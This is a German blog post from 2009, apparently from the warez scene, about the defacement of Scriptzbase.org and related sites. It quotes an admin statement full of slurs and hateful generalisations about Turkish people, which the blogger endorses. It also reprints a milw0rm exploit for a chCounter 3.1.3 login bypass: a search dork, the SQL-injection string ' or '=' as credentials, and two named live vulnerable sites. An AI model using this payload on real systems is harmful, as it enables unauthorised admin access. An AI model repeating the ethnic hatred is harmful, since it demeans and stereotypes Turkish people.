Quasi owned..

.. wuerde hoohead nun sagen ­čśÇ

Gestern am 17.04.2009 war anscheinend einiges los. Scriptload wurde “im namen von The Don” (ein Admin aus scriptzbase.org) defaced. War er natuerlich nicht, wie man sehen kann. Sowas wuerde er nie schreiben.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/scriptload-gehackt/

Dann folgte wieder eine Seite, diesmal undergroundimagez ein Projekt von The Don.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/undergroundimagez-gehackt/

Und da alle guten Dinge 3 sind, hat es danach nochmal eine gro├če Seite getroffen, naemlich Scriptzbase.org – Admins sind dort [email protected] und The Don.

Hier nochmal zuerst das kleine Statement:

Leider wurden wir die Nacht Opfer eines Hack-Angriffs
Wir bleiben nun doch erstmal Offlin bis zur kl├Ąrung
Dann erstmal sehen wie es weiter geht und ob es ├╝berhaupt weiter geht

Fuck of T├╝rke

Es ist doch immer wieder schade wie sich die schei├č Szene selber wenichten tut, Kinder ├╝bernehmen die Szene immer mehr

Scriptzbase.org hat nicht mit dem hack-Angriff auf Scriptload zu tun.

Und dann das etwas groessere:

Mehr pech kann man glaubich nicht haben, erst l├Ąuft alles schief bez├╝glich des Umzugs.
Dateiload nimmt unseren root vom Netz, ohne uns den neuen zur verf├╝gung zu stellen, dann sollen wir 1 1/2 – 2 Wochen warten,
bis der neue da ist. Darauf hatten wir aber kein bock, The Don hat stress geschoben, da wir ein reibunglosen Umzug haben wollten.
Dann stellte Dateiload uns den ALTEN wieder hin. Wegen dem Stress nahm man uns den Account Manager (zurecht), jetzt sollen wir den jetztigen root k├╝ndigen bevor wir den neuen bekommen *lol*.

In der Nacht zum 17.02 wurde ScriptzBase Opfer eines Hack-Angriffes, wie dies passiert ist, wissen wir selber noch nicht!.
Fest steht, es waren wie immer diese kleine mie├čen T├╝rken. Diese K├╝ndigen an ein Backup Online zu stellen.

Auch Speedtest von 1337-Crew versuchte uns zu Hacken, durch eine L├╝cke in VB trug er eine E-Mail adresse in die Administratoren Accounts ein, die damals noch zur seiner Seite heihachi.net f├╝hrte.
vermutlich weil ich heihachi.net als inkompetenter Hoster bezeichnete und diesen Hoster auf ScriptzBase Zensur.
Wo ich mit Account-Shop drauf gehostet habe, war meine Seite mehr down als alles andere. Hosting ist kein Kuchenbacken.

Wie es jetzt weiter geht wei├č ich noch nicht, ich habe ehrlich keine lust mehr auf ScriptzBase.
Wir stellen User vieles KOSTENLOS zur verf├╝gung, geben monatlich viel Geld f├╝r den schei├č root aus, seid es ScriptzBase gibt habe ich schon ├╝ber 3000ÔéČ daf├╝r aus gegeben.
Wozu dies alles?, f├╝r diese schei├č Szene, die nur nimmt und nichts gibt, f├╝r User die auf ScriptzBase aktiv leechen, aber Scriptzbase hassen tun, und alles daran setzen uns zu schaden, uns mit F├╝├čen Gr├Â├če 52 treten!.

Aber Ihr habt ja noch eure Englischen freunde, die Deutsche Szene wird immer mehr verschwinden, und das nur wegen dummen Leuten,
die meinen, sich beweisen zu m├╝ssen und mehr schaden anrichten als sie gutes tun.
Solche dummen Menschen werden dann auch noch bejubelt wie (Saddam Hussein) der alles in namen Allah tut!*Lach*,
damit diese sich freuen k├Ânnen.
Die T├╝rkischen hacker denken Sie tuen alles f├╝r Allah, denken wenn sie Terror laufen, Seiten hacken das diese gutes tun *Pfff*.
Sobald man eine T├╝rkische Seite hacken tut, laufen diese Terror und t├Âten Menschen, wir Deutschen essen doch lieber Kartoffeln!
T├╝rken schaden mehr das Internet als jedes andere Volk, sie verstehen nicht wof├╝r Gemeindschaft steht, Freude, Spass, Freundschaft.

Bald wird es bestimmt noch eine Deutsche Script Seite geben, die aber auch schnell offline geht *lach*
Ist das sch├Ân wenn dumme leute sich selber ins Bein schie├čen, das auch noch toll finden.

Mein motto war immer “Hack niemals Szene Seiten, es sei denn die sachden dich selber massiv” vTeam-Germany wurde damals von mir gehackt, weil dies zutraf, nicht OHNE grund.

Leute m├Âgen mich “[email protected]” nicht weil die mich nicht kennen, Sie Urteilen ├╝ber mich einfach, erz├Ąhlen schei├če, machen mit meinen Nick irgend eine schei├če auf andere Seiten. Und jetzt kommen die ganzen Kinder aus den l├Âchern die meinen etwas ├╝ber SB zu wissen, erz├Ąhlen irgend eine schei├če, wissen nichtmal was diese damit selber bezwecken wollen.

Ich werde die n├Ąchsten Tage dar├╝ber nachdenken, ob es sich noch lohnt die ganze schei├če f├╝r Leute zu machen die dich doch eigl hassen, die dir schaden wollen!.
Ob sich das lohnt, Monat f├╝r Monat gedanken zu machen woher ich das Geld f├╝r den root nehme.
Ob sich das Lohnt evtl meine zukunft durch Warez zu versauen.
Ob sich der ganze Stress und ├Ąrger Lohnt!.

In dem ScriptzBase Backup stehen IP-Adresse der User drinne, es ging einfach nicht mehr ohne logging, die User haben zu viel schei├če gebaut, wollten schaden anrichten.
Auch wenn wir auf Sicherheit der User achteten mussten wir auch selber auf Unsere achten, IP logging wollten wir nach dem Umzug Temporary machen, dazu kam es aber leider nicht mehr.
Uns war immer klar das das BKA niemals an unseren root kommen w├╝rde, wenn dann w├Ąre alles ganz schnell weg;)
User m├╝ssen aber keine Angst haben vor Besuch des BKA;), wer sich gedanken macht, macht sich l├Ącherlich;).

Auf diesen wegen Sorry f├╝r das Loggen, in der Szene geht es leider nicht mehr OHNE. 1337 macht es selber nicht anderes!.

Wie gesagt wir wissen nicht ob es ├╝berhaupt weiter geht, ich werde die Tage dar├╝ber nach denken.
Ich werde nur auf Diskussionen im Newsbox.cc Forum antworten.

Die ScriptzBase Administration
[email protected]

E-Mail: [email protected]

PS: ScriptzBase w├Ąre die Tage 2 Jahre geworden!

Quelle: http://scriptzbase.org/

Ich stimme der Aussage von [email protected] voll und ganz zu und ich denke er hat mit seinem Statement auch recht. Es gibt nur eine positive Sache zu sagen “defaces” sind wenigsten was anderes als langweiliger Dauer DDoS. Deface zeigt naemlich immerhin etwas koennen, was man bei DDoS nicht behaupten kann.

Aufjedenfall hoff ich, dass sich die Admins von Scriptzbase schnell erholen und am Projekt weitermachen.. Scriptzbase war nen tolles Forum. ­čÖé

Was gibts sonst noch interessantes zu berichten.. ah -tmh- hat mal wieder nen Exploit auf milw0rm veroeffentlicht, es handelt sich mal wieder um einen Login Bypass, sehr gefaehrlich das ganze, da man innerhalb von sekunden und ohne gro├če Anstrengung zum Admin werden kann:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" K├╝nftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]

Quelle: http://www.milw0rm.com/exploits/8461

Danke nochmal fuer das Erwaehnen in den Greetz ­čÖé

Was gibts noch aktuelles zu sagen? Vorerst nichts, wird jedoch heute noch etwas folgen ­čÖé

3 Replies to “Quasi owned..”

  1. Danke @ Py f├╝r dieses Statement
    Du hast mir vollkommen aus der Seele gesprochen.

    Es geht hier einfach gegen Menschen und nicht gegen das was sie tun.

    Der Hacker ob T├╝rke oder nicht das ist mir egal wusste was er tut und auch das er Seiten von The Don lahm legt.

    Denn ein Zufall war das nicht.

    Was das ganze mit Scriptload zu tun hat ist mir leider noch unklar aber auch egal.

    Ich habe SL erst einmal vom Netz genommen denn dieses Hin und her das User mehr wissen als man selbst geht einem schon auf die Eier

    Ich bin ein Mensch der eigentlich zu hackern hoch schaut aber wie wir ja alle wissen gibt es die guten und die b├Âsen

    Ich begreife es immer noch nicht warum Menschen meinen oder Beurteilen zu m├╝ssen ob eine Website schlecht ist oder nicht ob sie es gut finden oder nicht das “illegale” Scriptz angeboten werden berechtigt noch lange kein handeln eine Computersabotage zu begehen.

    Wo ist das gut und das b├Âse?????

    Warum ist gerade jetzt die Diskussion ├╝ber Kinderpornographie so enfacht

    Ein guter Hacker der etwas auf dem Kasten h├Ątte w├╝rde solche Seiten vernichten und nicht welche die ihm einfach nur nicht gefallen

    Naja muss man sich mal ├╝berlegen warum er diese nicht vernichtet

    Ich jedenfalls bin bereits seid Tagen am ├╝berlegen ob ich mich komplett zur├╝ckziehe

    Es geht mir einfach sehr gegen den Strich
    Wir halten unseren Kopf hin!!!!!
    Wir zahlen!!!!!!

    Noch ein paar Worte zu Scriptload
    Mitlerweile sind Ger├╝chte aufgetaucht das The Don oder ich diese selbst vernichtet haben weil diese Seite durch mich gehostet wird.
    Man gibt meinem alten Hosting xl-host die Schuld

    V├Âlliger Quatsch
    Ich selbst habe die scriptload.in ins Leben gerufen
    damit die Jungs endlich wieder erreichbar werden.

    W├Ąre ich Sau dumm wenn ich sie 1 Tag sp├Ąter abschiessen w├╝rde

    Diese Ger├╝chtek├╝che k├Ânnt ihr euch sparen

    Danke Euch f├╝rs lesen und danke jetzt schon f├╝r die dummen Kommentare aber auch f├╝r was gutes

    W├╝nsch euch allen was
    BiggMike

Leave a Reply

Your email address will not be published.